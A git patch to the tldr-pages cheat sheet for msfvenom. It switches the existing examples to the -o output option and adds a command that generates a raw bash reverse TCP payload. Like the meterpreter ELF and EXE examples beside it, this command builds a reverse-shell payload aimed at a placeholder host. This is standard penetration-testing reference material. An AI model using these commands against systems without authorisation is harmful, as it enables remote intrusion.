From cf7215e832aba55f8ace42e5418b5c8bf94c14af Mon Sep 17 00:00:00 2001 From: Fazle Arefin Date: Mon, 30 May 2022 15:58:30 +1000 Subject: [PATCH] msfvenom: add raw example (#8095) * Use built in output option in msfvenom * Add msfvenom example to generate bash reverse tcp handler * Add newline to the end of msfvenom file * Update pages/common/msfvenom.md Co-authored-by: Axel Navarro Co-authored-by: Axel Navarro --- pages/common/msfvenom.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/pages/common/msfvenom.md b/pages/common/msfvenom.md index e6f298a281..455358176b 100644 --- a/pages/common/msfvenom.md +++ b/pages/common/msfvenom.md @@ -17,8 +17,12 @@ - Create an ELF binary with a reverse TCP handler: -`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf > {{path/to/binary}}` +`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf -o {{path/to/binary}}` - Create an EXE binary with a reverse TCP handler: -`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe > {{path/to/binary.exe}}` +`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe -o {{path/to/binary.exe}}` + +- Create a raw bash with a reverse TCP handler: + +`msfvenom -p cmd/unix/reverse_bash LHOST={{local_ip}} LPORT={{local_port}} -f raw`